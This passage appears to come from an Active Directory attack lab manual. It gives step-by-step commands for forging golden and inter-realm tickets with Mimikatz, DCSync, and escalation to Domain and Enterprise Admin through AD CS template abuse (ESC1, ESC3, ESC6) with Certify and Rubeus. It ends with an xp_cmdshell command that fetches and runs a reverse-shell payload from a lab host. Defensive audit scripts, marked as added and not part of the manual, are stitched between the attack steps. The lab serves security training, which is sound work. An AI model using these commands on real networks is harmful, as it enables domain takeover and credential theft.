• Using DA access to dollarcorp.moneycorp.local, escalate privileges to Enterprise Admin or DA to the parent domain, moneycorp.local using dollarcorp's krbtgt hash.
Solution
Task - Using DA access to dollarcorp.moneycorp.local, escalate privileges to
Enterprise Admin or DA to the parent domain, moneycorp.local using
dollarcorp's krbtgt hash.
We already have the krbtgt hash from dcorp-dc. Let us create the inter-realm TGT and inject it. We will use the Student VM and the Mimikatz PowerShell script to create the inter-realm TGT.
Note: - We can also inject the ticket directly while creating it by passing /ptt as an argument to Mimikatz.

• Command

PowerShell Invoke-Mimi -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /krbtgt:4e9815869d2090ccfca61c1fe0d23986 /ticket:C:\Users\Public\krbtgt_tkt.kirbi"'

Next, inject the ticket using Mimikatz.
• Command

PowerShell Invoke-Mimi -Command '"kerberos::ptt C:\Users\Public\krbtgt_tkt.kirbi"'

Sweet! Let us run DCSync against mcorp-dc to extract secrets from it. We will use the Built-in Mimikatz task to perform the DCSync. Enter "lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.local" in the Command field.

Learning Objective 20
Task

• With DA privileges on dollarcorp.moneycorp.local, get access to SharedwithDCorp share on the DC of eurocorp.local forest.
Solution
Task - With DA privileges on dollarcorp.moneycorp.local, get access to
SharedwithDCorp share on the DC of eurocorp.local forest.
We need the trust key for abusing the trust between dollarcorp and eurocorp, which can be retrieved using Mimikatz. We can run the command below to extract the trust key from the dcorp-dc grunt. We will use the Built-in Mimikatz task to extract the trust key. Enter "lsadump::trust /patch" in the Command field.
Please note that the trust key may be different in your lab.

Forge the inter-realm TGT. We will run the below command from the student VM grunt.
• Command

PowerShell Invoke-Mimi -Command '"Kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-3333069040-3914854601-3606488808-519 /rc4:163373571e6c3e09673010fd60accdf0 /service:krbtgt /target:eurocorp.local /ticket:C:\Users\Public\trust_forest_tkt.kirbi"'

Now, let us check whether the file was saved to disk.
• Command

ls C:\Users\Public\

Get a TGS for a service (CIFS) in the target forest (eurocorp.local) using Rubeus. We will need to use the new version of Rubeus to inject the ticket, using the Assembly task. We can follow the steps mentioned in the earlier sections to load the Rubeus assembly. Enter asktgs /ticket:C:\Users\Public\trust_forest_tkt.kirbi /service:cifs/eurocorp-dc.eurocorp.local /dc:eurocorp-dc.eurocorp.local /domain:eurocorp.local /ptt value in the Parameters field.
Before injecting the ticket, we will need to create a new token using MakeToken and then inject the ticket.
• Command

RevertToSelf

MakeToken administrator eurocorp.local dummypassword

Now, try to access the target folder and file.
• Command

ls \\eurocorp-dc.eurocorp.local\SharedwithDCorp\

• Command

PowerShell cat \\eurocorp-dc.eurocorp.local\SharedwithDCorp\secret.txt

Learning Objective 21
Task

• Check if AD CS is used by the target forest and find any vulnerable/abusable templates.
• Abuse any such template(s) to escalate to Domain Admin and Enterprise Admin.
Solution
Task - Check if AD CS is used by the target forest and find any
vulnerable/abusable templates.
We will use the Certify tool to enumerate the Certificate Authorities in the target forest. Since Certify is not a part of Covenant by default, we will leverage the built-in task Assembly to load and run it. Below are the steps to use external .NET executables with the Built-in task Assembly. Please execute the RevertToSelf command before executing Certify.exe.

• Steps
o Note: - This task can also be executed from the Interact tab directly.

1. Click on the Grunt name in the Grunts page

2. Click on the Task tab

3. Select Assembly from the GruntTask.


4. Browse the Certify.exe file.
5. Enter Certify.exe value in AssemblyName field.
6. Enter cas value in Parameters field.
7. Click on Task button.

We can list all the templates using the following command; going through the output, we can find some interesting templates.
We can follow the above steps to run the built-in Assembly task, changing the Parameters field to "find".

The template HTTPSCertificates looks interesting, as it allows the requestor to supply the subject name. Let us get some more information about it.
We can follow the above steps to run the built-in Assembly task, changing the Parameters field to "find /enrolleeSuppliesSubject".

Task - Abuse any such template(s) to escalate to Domain Admin and
Enterprise Admin.
Privilege Escalation to DA and EA using ESC1
Sweet! The HTTPSCertificates template grants enrollment rights to the RDPUsers group and allows the requestor to supply the Subject Name. Recall that studentx is a member of the RDPUsers group. This means that we can request a certificate for any user as studentx.
Let us request a certificate for the Domain Admin – Administrator.
We can follow the above steps to run the built-in Assembly task, changing the Parameters field to "request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:HTTPSCertificates /altname:administrator".
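
The ESC1 conditions just described can be checked mechanically from the template attributes that Certify reads. As an added example (not from the lab manual or Certify), the Python below evaluates constructed template objects for the full set of conditions: ENROLLEE_SUPPLIES_SUBJECT in msPKI-Certificate-Name-Flag, an EKU usable for logon (or no EKU at all), no manager approval and no required signatures, and enrollment rights for a low-privileged principal. The template dictionaries, the "enroll" list standing in for the template's ACL, and treating RDPUsers as low-privileged are assumptions made for the sample.

```python
"""Flag AD CS certificate templates that match the ESC1 pattern (constructed samples)."""
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1   # msPKI-Certificate-Name-Flag bit
CT_FLAG_PEND_ALL_REQUESTS = 0x2           # msPKI-Enrollment-Flag bit: manager approval

# EKU OIDs that a domain controller accepts for certificate logon (PKINIT).
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2": "Client Authentication",
    "1.3.6.1.4.1.311.20.2.2": "Smart Card Logon",
    "1.3.6.1.5.2.3.4": "PKINIT Client Authentication",
    "2.5.29.37.0": "Any Purpose",
}
SERVER_AUTH = "1.3.6.1.5.5.7.3.1"

# Principals whose membership is effectively every user. RDPUsers is included on
# the assumption, taken from the lab text, that ordinary users are members of it.
LOW_PRIV_PRINCIPALS = {"Domain Users", "Authenticated Users", "Domain Computers", "RDPUsers"}

# Constructed templates; "enroll" lists the principals holding the Enroll right.
SAMPLE_TEMPLATES = [
    {"name": "HTTPSCertificates", "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x0,
     "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": [SERVER_AUTH, "1.3.6.1.5.5.7.3.2"],
     "enroll": ["RDPUsers", "Domain Admins"]},
    {"name": "User", "msPKI-Certificate-Name-Flag": 0x0, "msPKI-Enrollment-Flag": 0x0,   # subject built from AD
     "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"], "enroll": ["Domain Users"]},
    {"name": "WebServer", "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x0,  # no logon EKU
     "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": [SERVER_AUTH], "enroll": ["Domain Admins"]},
    {"name": "ApprovedClient", "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x2,  # manager approval
     "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"], "enroll": ["Domain Users"]},
    {"name": "CoSigned", "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x0,    # signature required
     "msPKI-RA-Signature": 1, "pKIExtendedKeyUsage": [], "enroll": ["Domain Users"]},
]


def allows_logon(template):
    """True when the template's EKUs permit authentication; an empty EKU list means any purpose."""
    ekus = template.get("pKIExtendedKeyUsage") or []
    return not ekus or any(oid in AUTH_EKUS for oid in ekus)


def esc1_findings(templates, low_priv=LOW_PRIV_PRINCIPALS):
    """(template name, low-privileged enrollers) for every template meeting all ESC1 conditions."""
    findings = []
    for t in templates:
        if not (t["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT):
            continue  # subject comes from AD, not from the request
        if t["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS:
            continue  # a certificate manager must approve each request
        if t.get("msPKI-RA-Signature", 0) > 0:
            continue  # request must carry an authorized signature
        if not allows_logon(t):
            continue  # certificate could not be used for Kerberos logon
        enrollers = sorted(set(t["enroll"]) & low_priv)
        if enrollers:
            findings.append((t["name"], enrollers))
    return findings


if __name__ == "__main__":
    for name, who in esc1_findings(SAMPLE_TEMPLATES):
        print(f"ESC1: {name} enrollable by {', '.join(who)}")
```

Each `continue` corresponds to a remediation: clearing ENROLLEE_SUPPLIES_SUBJECT, enabling manager approval, requiring a signature, removing the logon EKU, or tightening the enrollment ACL all break the chain; the first one is what makes the HTTPSCertificates template from the lab abusable in the first place.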

Copy all the text between -----BEGIN RSA PRIVATE KEY----- and -----END CERTIFICATE----- and save it to a cert.pem file on the Covenant instance. We need to convert the cert.pem file to a .pfx file. We will use openssl with SecretPass@123 as the export password.

Note: Remove the blank lines when saving the output to the cert.pem file.


• Command

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out esc1-DA.pfx

Use the PFX created above with Rubeus to request a TGT for the DA - Administrator!
Note: Since the version of Rubeus bundled with Covenant does not have features for abusing certificates, we will leverage the built-in Assembly task to upload a new version of Rubeus and perform the attack.

First, we need to Upload the Certificate on the student VM.

• Command

Upload C:\AD\Tools\esc1-DA.pfx



Now we need to run Rubeus to request a TGT.
Follow the steps mentioned in the section above to execute external .NET executables with the built-in Assembly task. Enter asktgt /user:administrator /certificate:C:\AD\Tools\esc1-DA.pfx /password:SecretPass@123 in the Parameters field.



Before injecting the ticket, we will need to create a new token using MakeToken and then
inject the ticket.
• Command

MakeToken administrator dollarcorp.moneycorp.local dummypassword

• Command

Rubeus ptt /ticket:<base64 ticket from the asktgt output>

Let us check if we have the DA privileges now.

• Command

ls \\dcorp-dc.dollarcorp.moneycorp.local\c$



Similarly, we can get Enterprise Admin privileges!
We can leverage the same certificate to request the TGT for the EA, or else execute the same command and request a new certificate. Follow the steps above to run the built-in Assembly task, setting the Parameters field to asktgt /user:moneycorp.local\administrator /certificate:C:\AD\Tools\esc1-DA.pfx /dc:mcorp-dc.moneycorp.local /password:SecretPass@123. But before running the above command we need to run RevertToSelf.



Before injecting the ticket, we will need to create a new token using MakeToken and then
inject the ticket.
• Command

MakeToken administrator moneycorp.local dummypassword

• Command

Rubeus ptt /ticket:<base64 ticket from the asktgt output>


Let us try to access the mcorp-dc to confirm our privileges!
• Command

ls \\mcorp-dc.moneycorp.local\c$

Awesome! We have EA privileges!


Privilege Escalation to DA and EA using ESC3
If we list the vulnerable templates in moneycorp, we get the following result. We will use the Certify.exe tool. Follow the steps above to run the built-in Assembly task, setting the Parameters field to "find /vulnerable". But before running the above command we need to run RevertToSelf.

The "SmartCardEnrollment-Agent" template has the EKU for Certificate Request Agent and grants enrollment rights to Domain Users. If we can find another template that has an EKU that allows domain authentication and has an application policy requirement of Certificate Request Agent, we can request a certificate on behalf of any user. Follow the steps above to run the built-in Assembly task, setting the Parameters field to "find".
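As an added, read-only audit that is not part of the lab manual: the script below checks every template for the conditions behind both the ESC1 finding above (HTTPSCertificates) and the ESC3 agent/target pair described here. It assumes the ActiveDirectory module on a domain-joined host; the lab's RDPUsers group is treated as a low-privileged enroller because the manual shows it holding enrollment rights.

```powershell
# Added example, not part of the lab manual: read-only audit of certificate templates for the
# ESC1 and ESC3 conditions. Flag values are the documented msPKI-* constants; 'RDPUsers' is
# an assumption taken from this lab (adjust the list for your own environment).
Import-Module ActiveDirectory

$configNC = (Get-ADRootDSE).configurationNamingContext
$tmplBase = "CN=Certificate Templates,CN=Public Key Services,CN=Services,$configNC"
$ENROLLEE_SUPPLIES_SUBJECT = 0x1   # msPKI-Certificate-Name-Flag
$PEND_ALL_REQUESTS         = 0x2   # msPKI-Enrollment-Flag: manager approval required
$authEkus   = '1.3.6.1.5.5.7.3.2','1.3.6.1.5.2.3.4','1.3.6.1.4.1.311.20.2.2','2.5.29.37.0'
$agentEku   = '1.3.6.1.4.1.311.20.2.1'                 # Certificate Request Agent
$enrollGuid = '0e10c968-78fb-11d2-90d4-00c04f79dc55'   # Certificate-Enrollment extended right
$lowPriv    = 'Domain Users','Authenticated Users','Everyone','Domain Computers','RDPUsers'
$props = 'displayName','msPKI-Certificate-Name-Flag','msPKI-Enrollment-Flag','pKIExtendedKeyUsage',
         'msPKI-RA-Signature','msPKI-RA-Application-Policies'

Get-ADObject -SearchBase $tmplBase -LDAPFilter '(objectClass=pKICertificateTemplate)' -Properties $props |
ForEach-Object {
    $t = $_
    $ekus            = @($t.pKIExtendedKeyUsage | Where-Object { $_ })
    $allowsAuth      = ($ekus.Count -eq 0) -or [bool]($ekus | Where-Object { $authEkus -contains $_ })
    $noApproval      = ([int]$t.'msPKI-Enrollment-Flag' -band $PEND_ALL_REQUESTS) -eq 0
    $suppliesSubject = ([int]$t.'msPKI-Certificate-Name-Flag' -band $ENROLLEE_SUPPLIES_SUBJECT) -ne 0

    # Who can enroll: Allow ACEs carrying the Enroll right or GenericAll on the template object.
    $acl = Get-Acl -Path "AD:\$($t.DistinguishedName)"
    $enrollers = $acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        ($_.ObjectType -eq [guid]$enrollGuid -or $_.ActiveDirectoryRights -match 'GenericAll')
    } | ForEach-Object { $_.IdentityReference.Value.Split('\')[-1] } | Sort-Object -Unique
    $lowPrivEnroll = [bool]($enrollers | Where-Object { $lowPriv -contains $_ })

    $findings = @()
    if ($suppliesSubject -and $allowsAuth -and $noApproval -and $lowPrivEnroll) {
        $findings += 'ESC1: requester-supplied subject, auth EKU, no approval, low-priv enrollment'
    }
    if (($ekus -contains $agentEku) -and $noApproval -and $lowPrivEnroll) {
        $findings += 'ESC3 agent template: Certificate Request Agent EKU enrollable by low-priv users'
    }
    $raPolicies = @($t.'msPKI-RA-Application-Policies' | Where-Object { $_ }) -join ' '
    if ([int]$t.'msPKI-RA-Signature' -ge 1 -and $raPolicies -like "*$agentEku*" -and $allowsAuth) {
        $findings += 'ESC3 target template: auth EKU issued on an enrollment-agent co-signed request'
    }
    if ($findings) {
        [pscustomobject]@{ Template = $t.displayName; Enrollers = ($enrollers -join ', '); Findings = ($findings -join '; ') }
    }
}
```

Templates flagged here are the ones to fix by removing the low-privileged Enroll ACE, requiring manager approval, or clearing the "supply in request" option.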



Sweet! Now, request an Enrollment Agent Certificate from the template "SmartCardEnrollment-Agent". Follow the steps above to run the built-in Assembly task, setting the Parameters field to "request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:SmartCardEnrollment-Agent".

Like earlier, save the certificate text to cert.pem and convert it to .pfx. Let us keep using SecretPass@123 as the export password.
Note: Remove the blank lines while saving the output to the cert.pem file.

• Command

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out esc3-agent.pfx



Now we can use the Enrollment Agent Certificate to request a certificate for DA from the template
SmartCardEnrollment-Users.
First, we need to Upload the Certificate on the student VM.
• Command

Upload C:\AD\Tools\esc3-agent.pfx

Follow the steps above to run the built-in Assembly task, setting the Parameters field to "request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:SmartCardEnrollment-Users /onbehalfof:dcorp\administrator /enrollcert:C:\AD\Tools\esc3-agent.pfx /enrollcertpw:SecretPass@123".



Once again, save the certificate text to cert.pem and convert the .pem to .pfx, still using SecretPass@123 as the export password.
Note: Remove the blank lines while saving the output to the cert.pem file.

• Command

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out esc3-DA.pfx

Use the PFX created above with Rubeus to request a TGT for DA - Administrator!
Follow the steps above to run the built-in Assembly task, setting the Parameters field to "asktgt /user:administrator /certificate:C:\AD\Tools\esc3-DA.pfx /password:SecretPass@123".
Note: Since the current version of Rubeus that is bundled with Covenant does not have
features for abusing Certificates, we will leverage the built-in Assembly task to upload a new
version of Rubeus and perform the attack.

First, we need to Upload the Certificate on the student VM.


• Command

Upload C:\AD\Tools\esc3-DA.pfx

Before injecting the ticket, we will need to create a new token using MakeToken and then
inject the ticket.
• Command

MakeToken administrator dollarcorp.moneycorp.local dummypassword

• Command

Rubeus ptt /ticket:<base64 ticket from the asktgt output>


Let us check if we have the DA privileges now.
• Command

ls \\dcorp-dc.dollarcorp.moneycorp.local\c$

To escalate to Enterprise Admin, we just need to change the request to the SmartCardEnrollment-Users template and the Rubeus command.
Follow the steps above to run the built-in Assembly task, setting the Parameters field to "request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:SmartCardEnrollment-Users /onbehalfof:mcorp\administrator /enrollcert:C:\AD\Tools\esc3-agent.pfx /enrollcertpw:SecretPass@123". But before running the above command we need to run RevertToSelf.



Once again, save the certificate text to cert.pem and convert the .pem to .pfx, still using SecretPass@123 as the export password.
Note: Remove the blank lines while saving the output to the cert.pem file.

• Command

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out esc3-EA.pfx

Use the PFX created above with Rubeus to request a TGT for DA - Administrator!
Follow the steps above to run the built-in Assembly task, setting the Parameters field to "asktgt /user:moneycorp.local\administrator /certificate:C:\AD\Tools\esc3-EA.pfx /dc:mcorp-dc.moneycorp.local /password:SecretPass@123".
Note: Since the current version of Rubeus that is bundled with Covenant does not have
features for abusing Certificates, we will leverage the built-in Assembly task to upload a new
version of Rubeus and perform the attack.



First, we need to Upload the Certificate on the student VM.
• Command

Upload C:\AD\Tools\esc3-EA.pfx



Before injecting the ticket, we will need to create a new token using MakeToken and then
inject the ticket.
• Command

MakeToken administrator moneycorp.local dummypassword

• Command

Rubeus ptt /ticket:<base64 ticket from the asktgt output>


Finally, let us access mcorp-dc!

• Command

ls \\mcorp-dc.moneycorp.local\c$



Privilege Escalation to DA and EA using ESC6

The CA in moneycorp has EDITF_ATTRIBUTESUBJECTALTNAME2 flag set.

Follow the steps above to run the built-in Assembly task, setting the Parameters field to "cas". But before running the above command we need to run RevertToSelf.



This means that we can request a certificate for ANY user from any template that allows enrollment for normal/low-privileged users.
Follow the steps above to run the built-in Assembly task, setting the Parameters field to "find".

Sweet! As a member of the RDPUsers group, we can request a certificate for any user using the CA-Integration template. Let us do it for DA. Use "/altname:moneycorp.local\administrator" in the command below for escalation to EA.
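As an added check that is not part of the lab manual: the script below reads the CA's EditFlags with certutil, reports whether EDITF_ATTRIBUTESUBJECTALTNAME2 is set (the condition the "cas" output above shows), and with -Remediate clears it. It assumes certutil, CA administrator rights, and the lab's CA config string as the default.

```powershell
# Added example, not part of the lab manual: detect and optionally clear the
# EDITF_ATTRIBUTESUBJECTALTNAME2 edit flag on a CA. Default CA config is the lab's CA.
param(
    [string]$CAConfig = 'mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA',
    [switch]$Remediate
)
# certutil decodes the EditFlags DWORD and lists every set flag by name, one per line.
$editFlags = (certutil -config $CAConfig -getreg policy\EditFlags 2>&1) -join "`n"
if ($editFlags -match 'EDITF_ATTRIBUTESUBJECTALTNAME2') {
    Write-Warning "$CAConfig accepts requester-supplied SAN attributes on every template (ESC6)."
    if ($Remediate) {
        # A leading '-' on the flag name tells certutil to clear that bit.
        certutil -config $CAConfig -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2
        # The new value is only read when the CA service restarts on the CA host.
        $caHost = $CAConfig.Split('\')[0]
        Invoke-Command -ComputerName $caHost -ScriptBlock { Restart-Service -Name CertSvc }
        Write-Output "Flag cleared and CertSvc restarted on $caHost; re-run without -Remediate to verify."
    }
} else {
    Write-Output "OK: EDITF_ATTRIBUTESUBJECTALTNAME2 is not set on $CAConfig."
}
```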



Follow the steps above to run the built-in Assembly task, setting the Parameters field to "request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:CA-Integration /altname:administrator".

Once again, save the certificate text to cert.pem and convert the .pem to .pfx, still using SecretPass@123 as the export password.
Note: Remove the blank lines while saving the output to the cert.pem file.

• Command

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out esc6-DA.pfx

Use the PFX created above with Rubeus to request a TGT for DA - Administrator!
Follow the steps above to run the built-in Assembly task, setting the Parameters field to "asktgt /user:administrator /certificate:C:\AD\Tools\esc6-DA.pfx /password:SecretPass@123".
Note: Since the current version of Rubeus that is bundled with Covenant does not have
features for abusing Certificates, we will leverage the built-in Assembly task to upload a new
version of Rubeus and perform the attack.



First, we need to Upload the Certificate on the student VM.
• Command

Upload C:\AD\Tools\esc6-DA.pfx



Before injecting the ticket, we will need to create a new token using MakeToken and then
inject the ticket.
• Command

MakeToken administrator dollarcorp.moneycorp.local dummypassword

• Command

Rubeus ptt /ticket:<base64 ticket from the asktgt output>

Finally, let us access dcorp-dc!

• Command

ls \\dcorp-dc.dollarcorp.moneycorp.local\c$

Learning Objective 22
Task

• Get a reverse shell on a SQL server in eurocorp forest by abusing database links from
dcorp-mssql.
Solution
Task - Get a reverse shell on a SQL server in eurocorp forest by abusing
database links from dcorp-mssql.
Let us start by enumerating the SQL servers in the domain and checking whether studentx has privileges to connect to any of them. We can use the PowerUpSQL module for enumeration. We will need to import the PowerUpSQL.ps1 PowerShell script using the PowerShellImport built-in task in Covenant. But before running the commands below we need to run RevertToSelf.
Note: In case we face issues while enumerating the MSSQL instance, we can leverage MakeToken to create a new token with student privileges and execute the commands again.

Steps

o Note: - This task can also be executed from the Interact tab directly.
1. Click on the Grunt name in the Grunts page



2. Click on the Task tab

3. Select PowerShellImport from the GruntTask.


4. Browse the PowerUpSQL.ps1 PowerShell script.
5. Click on Task button.



• Command

PowerShell Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose

We will now use Get-SQLServerLinkCrawl to crawl the database links automatically.
• Command

PowerShell Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local -Verbose

Sweet! We have sysadmin on eu-sql server!
If xp_cmdshell is enabled (or RPC out is true, which is set to false in this case), it is possible to execute commands on eu-sql using linked databases. To avoid dealing with multiple quotes and escapes, we can use the following command:
• Command

PowerShell Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local -Query "exec master..xp_cmdshell 'whoami'"

AlteredSecurity Attacking and Defending Active Directory 230


Let us try to gain access to the machine using a PowerShell grunt.
• Command

PowerShell Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local -Query "exec master..xp_cmdshell 'powershell -c IEX (iwr -UseBasicParsing http://172.16.100.2/StudentVMGrunt.ps1)'" -QueryTarget eu-sql
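As an added, defender-side counterpart to the link crawl above (not part of the lab manual): the script below enumerates the linked servers configured on dcorp-mssql, shows whether each allows RPC Out and which remote login it maps to, and checks whether xp_cmdshell is enabled, the two settings that decide whether a link can be turned into command execution. It assumes the SqlServer module (Invoke-Sqlcmd) and a login on the instance; the instance name is the lab's.

```powershell
# Added example, not part of the lab manual: audit linked servers and xp_cmdshell on an
# instance. Uses only sys.servers, sys.linked_logins and sys.configurations.
Import-Module SqlServer
$instance = 'dcorp-mssql.dollarcorp.moneycorp.local'

$links = Invoke-Sqlcmd -ServerInstance $instance -Query @"
SELECT s.name, s.data_source, s.is_rpc_out_enabled,
       ll.remote_name, ll.uses_self_credential
FROM sys.servers AS s
LEFT JOIN sys.linked_logins AS ll ON ll.server_id = s.server_id
WHERE s.is_linked = 1
"@
$xp = Invoke-Sqlcmd -ServerInstance $instance -Query `
    "SELECT value_in_use FROM sys.configurations WHERE name = 'xp_cmdshell'"

foreach ($l in $links) {
    $risk = @()
    if ($l.is_rpc_out_enabled) { $risk += 'RPC Out enabled: remote EXEC possible over the link' }
    # A fixed remote login means every local caller reaches the remote side as that account.
    if ($l.remote_name -is [string] -and $l.uses_self_credential -eq $false) {
        $risk += "all callers map to fixed remote login '$($l.remote_name)'"
    }
    [pscustomobject]@{ Link = $l.name; Target = $l.data_source; Risk = ($risk -join '; ') }
}
if ($xp.value_in_use -eq 1) {
    # Hardening on the affected instance: EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;
    # and EXEC sp_serveroption '<link>', 'rpc out', 'false' for links that do not need it.
    Write-Warning "xp_cmdshell is enabled on $instance"
}
```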
